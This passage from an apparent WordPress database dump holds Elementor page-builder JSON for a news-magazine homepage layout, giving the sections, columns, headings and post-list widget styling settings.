le\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1293,458,'_elementor_version','0.4'),(1294,458,'_elementor_css','a:3:{s:4:\"time\";i:1508894312;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1300,459,'_elementor_edit_mode','builder'),(1301,459,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"